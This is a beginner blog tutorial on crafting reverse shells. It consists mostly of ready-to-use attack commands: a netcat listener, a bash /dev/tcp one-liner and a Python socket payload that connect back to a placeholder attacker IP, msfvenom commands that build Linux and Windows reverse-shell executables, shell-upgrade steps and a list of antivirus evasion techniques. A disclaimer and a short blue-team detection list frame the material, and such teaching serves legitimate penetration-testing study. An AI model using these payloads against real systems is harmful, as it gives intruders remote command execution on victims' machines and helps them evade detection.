Skip to main content
🛠Hacking Techniquesbeginner2 min read

Payload Crafting 101: Building Your First Reverse Shell

A beginner-friendly guide to understanding and creating reverse shell payloads. Learn the fundamentals before diving into advanced exploitation.

payloadsreverse shellsexploitationfundamentals
Share:𝕏in

Payload Crafting 101: Building Your First Reverse Shell

Understanding how payloads work is fundamental to both offensive security and defense. Let's demystify reverse shells.

Legal Disclaimer: Only use these techniques on systems you own or have explicit written permission to test. Unauthorized access is a crime.

What Is a Reverse Shell?

Normal network connections work like this: Client connects TO Server.

A reverse shell flips this: Target connects back TO You.

Why? Firewalls typically block incoming connections but allow outgoing ones. A reverse shell exploits this.

The Listener (Attacker Side)

You need something to receive the connection:

nc -lvnp 4444

Options breakdown: -l (listen), -v (verbose), -n (no DNS), -p 4444 (port)

Basic Payloads by Language

Bash

bash -i >& /dev/tcp/YOUR_IP/4444 0>&1

Python

import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("YOUR_IP",4444))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
subprocess.call(["/bin/sh","-i"])

Generating Payloads with msfvenom

For more sophisticated payloads:

# Linux reverse shell
msfvenom -p linux/x64/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 -f elf -o shell.elf

# Windows reverse shell
msfvenom -p windows/x64/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 -f exe -o shell.exe

Upgrading Your Shell

Raw shells are painful. Upgrade with Python:

python3 -c 'import pty;pty.spawn("/bin/bash")'

For full TTY, background with Ctrl+Z, then:

stty raw -echo; fg
export TERM=xterm

Evasion Basics

Antivirus will catch basic payloads. Techniques to explore:

  1. Encoding (Base64, hex)
  2. Obfuscation
  3. Staged payloads
  4. Custom protocols (HTTPS, DNS tunneling)
  5. Memory-only execution

Detection (Blue Team)

If defending, watch for:

  • Unusual outbound connections
  • cmd.exe or powershell.exe spawning unexpectedly
  • Network connections from interpreters
  • Base64 encoded command line arguments

Practice Environments

Never practice on systems you don't own. Use:

  • Hack The Box
  • TryHackMe
  • Your own lab

Ready to learn more offensive techniques? Contact m1k3@msquarellc.net about hands-on training.

Found this helpful? Share it:

Share:𝕏in

Need Help With This?

Have questions about implementing these security practices? Let's discuss your specific needs.

Get in Touch

More in Hacking Techniques

Explore more articles in this category.

Browse 🛠 Hacking Techniques

Related Articles